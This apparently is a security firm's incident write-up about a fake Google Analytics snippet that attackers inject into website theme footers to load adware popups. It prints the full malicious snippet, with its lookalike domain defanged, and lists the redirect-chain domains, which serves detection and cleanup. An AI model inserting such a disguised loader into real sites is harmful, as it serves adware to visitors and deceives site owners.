Fake Google Analytics tracking code leading to Adware

Our Incident Response process makes sure we remove all malicious files and other small pieces of code inserted in good files that could be used to re-gain access to the environment. These pieces of malware could be very easy to detect based on encoding level, obfuscation, suspicious functions and few other variables. Some malware, on the other hand, try to hide themselves in plain sight by using regular PHP or JavaScript functions or pretending to be an authority they are not.

In this post, we’ll describe an issue where attackers injected an interesting script resembling the Google Analytics Tracking Code that leads to Adware. Once the website is compromised with this type of infection, the site displays the following Popup with Adware:

In order to load those popups, attackers injected the following snippet into a theme file:

<!-- Google Analytics --><script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=0;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,'script','hxxps://google-analytics[.]ga/analytics?a8','qa');qa('create', 'UA-F1284271354829RWJ3RT', 'auto');</script><!-- End Google Analytics -->

As you might have noticed it, the domain “hxxps://google-analytics[.]ga” doesn’t belong to Google and pretends to load the correct one “hxxps://google-analytics[.]com/ga.js“. The domain is protected by a whois proxy service (Stichting OpenTLD WHOIS Proxy).

We detected the following domains were used in the redirect chains:

• google-analytics[.]ga
• hxxps://trafficome[.]ga/ga
• hxxps://m1ii[.]ml

The code is usually injected on the footer of the current theme because it will be loaded every time the website is accessed.